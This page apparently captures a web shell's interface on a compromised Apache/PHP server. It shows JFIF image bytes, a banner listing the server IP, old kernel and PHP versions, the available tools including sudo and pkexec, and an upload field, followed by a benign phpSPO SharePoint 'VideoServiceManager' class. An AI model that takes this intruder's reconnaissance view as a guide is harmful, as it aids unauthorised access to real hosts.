????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.16.215.60 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/local/bin/vendor/vgrem/php-spo/src/SharePoint/Publishing/ |
Upload File : |
<?php /** * This file was generated by phpSPO model generator 2019-11-16T20:28:28+00:00 16.0.19506.12022 */ namespace Office365\SharePoint\Publishing; use Office365\Runtime\ClientObject; use Office365\Runtime\ResourcePath; use Office365\SharePoint\ClientContext; class VideoServiceManager extends ClientObject { public function __construct(ClientContext $ctx, $videoPortalUrl) { $ctx->setBaseUrl($videoPortalUrl); parent::__construct($ctx, new ResourcePath("VideoService")); } /** * @return VideoChannelCollection */ public function getChannels() { return new VideoChannelCollection($this->getContext(), new ResourcePath("Channels", $this->getResourcePath())); } /** * @return VideoChannelCollection */ public function getCanEditChannels() { return new VideoChannelCollection($this->getContext(), new ResourcePath("CanEditChannels", $this->getResourcePath())); } /** * @return SpotlightChannelCollection */ public function getSpotlightChannels() { return new SpotlightChannelCollection($this->getContext(), new ResourcePath("SpotlightChannels", $this->getResourcePath())); } /** * @return SpotlightVideoCollection */ public function getSpotlightVideos() { return new SpotlightVideoCollection($this->getContext(), new ResourcePath("SpotlightVideos", $this->getResourcePath())); } /** * @return string */ public function getAutomaticMigrationType() { if (!$this->isPropertyAvailable("AutomaticMigrationType")) { return null; } return $this->getProperty("AutomaticMigrationType"); } /** * @var string */ public function setAutomaticMigrationType($value) { $this->setProperty("AutomaticMigrationType", $value, true); } /** * @return bool */ public function getCanAdministratePortalByCurrent() { if (!$this->isPropertyAvailable("CanAdministratePortalByCurrent")) { return null; } return $this->getProperty("CanAdministratePortalByCurrent"); } /** * @var bool */ public function setCanAdministratePortalByCurrent($value) { $this->setProperty("CanAdministratePortalByCurrent", $value, true); } /** * @return bool */ public function getCanCreateChannelsByCurrent() { if (!$this->isPropertyAvailable("CanCreateChannelsByCurrent")) { return null; } return $this->getProperty("CanCreateChannelsByCurrent"); } /** * @var bool */ public function setCanCreateChannelsByCurrent($value) { $this->setProperty("CanCreateChannelsByCurrent", $value, true); } /** * @return bool */ public function getCanViewPortalByCurrent() { if (!$this->isPropertyAvailable("CanViewPortalByCurrent")) { return null; } return $this->getProperty("CanViewPortalByCurrent"); } /** * @var bool */ public function setCanViewPortalByCurrent($value) { $this->setProperty("CanViewPortalByCurrent", $value, true); } /** * @return string */ public function getUploadGuidelinesLink() { if (!$this->isPropertyAvailable("UploadGuidelinesLink")) { return null; } return $this->getProperty("UploadGuidelinesLink"); } /** * @var string */ public function setUploadGuidelinesLink($value) { $this->setProperty("UploadGuidelinesLink", $value, true); } /** * @return string */ public function getVideoGuidelinesLink() { if (!$this->isPropertyAvailable("VideoGuidelinesLink")) { return null; } return $this->getProperty("VideoGuidelinesLink"); } /** * @var string */ public function setVideoGuidelinesLink($value) { $this->setProperty("VideoGuidelinesLink", $value, true); } }